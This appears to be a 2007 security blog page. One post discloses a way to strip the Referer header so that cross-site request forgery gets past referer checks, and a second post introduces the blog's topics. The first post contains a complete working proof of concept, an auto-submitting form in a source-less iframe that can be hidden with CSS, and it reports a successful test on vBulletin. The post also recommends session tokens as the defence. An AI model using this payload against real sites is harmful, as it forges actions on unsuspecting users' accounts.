30 September 2007
I've stumbled across this a few months (weeks?) ago, and since I've opened this new blog, I'd like to disclose it (or could this have already been found?).
There are many sites that rely upon the referer header in order to filter XSRF. This has long been proven to be a faulty technique, but the latest browser updates made it seem secure again.
As XMLHttpRequest and Flash have been limited to communicating only with the domain they came from, there is no way (that I know of) to forge request headers and still have the victim's correct cookies sent along with them.
So I dug a bit here and there, and found a way to prevent the referer header from being sent. No, you can't spoof it to an arbitrary address, but "no-address" usually does the trick just as well.
Here's a full POC.
<html>
<body>
<script>
// Build the cross-site form inside the blank frame and submit it from there.
function doit()
{
  var html;
  html = '<form action="http://somesite.com/vuln.php" method="post" name="fname">'
       + '<input type="text" name="SOME_FIELD" value="ARBITRARY VALUE">'
       + '</form>';
  // The frame has no src, so the browser treats its document as a blank page...
  window.frames["frm"].document.body.innerHTML = html;
  // ...and the request it submits carries no Referer header at all.
  window.frames["frm"].document.fname.submit();
}
</script>
<!-- An iframe with no src attribute; doit() runs once the blank frame has loaded. -->
<iframe name="frm" onload="doit()"></iframe>
</body>
</html>
The magic here is performed by creating an IFRAME without a SRC attribute. You can then write content (the XSRF form to be submitted) into the IFRAME via JavaScript, and submit it the same way. Apparently both IE and Firefox see the frame as a blank page, and act as if the form was sent from a local HTML file, so no referer header is sent.
I've tested this on the latest Firefox, and IE6.0 (yeah, kill me for not having the crappy 7.0).
Obviously a little CSS can hide the frame completely, and the victim won't know he/she has been attacked. Pretty serious, I guess.
I bet there are many systems vulnerable to this. I successfully tested this on vBulletin 3.6.8. Yep, they rely on the referer in their forms.
The way to avoid being vulnerable to this has already been suggested many times before: DO NOT rely on referer information. To prevent XSRF, use a one-time, session-bound token (key) in your forms.
That's it for now.
Posted by: kGen | In category: CSRF (XSRF) | Comments (1)
30 September 2007
And there will be light!
Seems that everything is working now. Well, almost everything. For the next few days the "search" and "user options" features won't be available. Why, you ask? Simple. I haven't implemented them yet... This is the price you pay for making a custom system.
So, since this post is here to stay, I'll give you a brief intro into what this whole site deals with. As you can see, my <title> tag gives away a few keywords about what's gonna be in here. Webappsec, SEO, and more related stuff.
Let me elaborate on each of those separately.
In case you didn't know, "Webappsec" stands for "Web Application Security".
In today's world, information is everything. And thanks to the Internet, it's also everywhere. Traditional info. security was focused on finding and eliminating known software bugs like buffer overflows, off-by-one errors, and the like. Back then, you could fire up a debugger on the buggy program and track down whatever problem was bothering you.
Today, info. security is different. Since everything is connected into one live giant web, you can't just sit back and debug whatever you want for as long as you want. If you've got some interesting data hosted on the net, it won't wait for you to protect it.
The web is built on the same protocols, with many similar implementations. Webappsec is all about finding security problems in those implementations, or even in the protocols themselves, which lets you audit live websites (or networks) quickly and seamlessly.
This site will also deal with SEO, Search Engine Optimization.
Not all information needs to stay under the cloak. On the contrary, most info. online is made in order to be read by the public. And for that purpose, we've got search engines. If people can find you on those, you can rest assured that the visitors on your website are enjoying whatever it is you serve them.
If you want to be "visible" online, you need to rank high on Google, Yahoo, MSN, and the rest of the SEs. Learning SEO tactics is going to let you do just that. No matter what you write about, or what you sell, smart SEO will always increase the traffic to your website. On the net, that's pretty much all you can wish for.
This site will also deal with other topics. I promise to give away some sources of my own (php, anyone?), and guide you through the development stages of various features.
Anyway, this site is mainly a blog. It will contain mostly NEWS about the topics I mentioned. But don't worry, I'm planning to give the "articles" section a great deal of my time, so this site can deal with more general stuff too.
So that's it for this post. Hope someone reads this. Guess I'm going to apply some SEO here myself...
Posted by: kGen | In category: Site news | Comments (3)
Copyright (C) 2007-2008. Some rights reserved. Distribute freely, but don't forget to link to the source.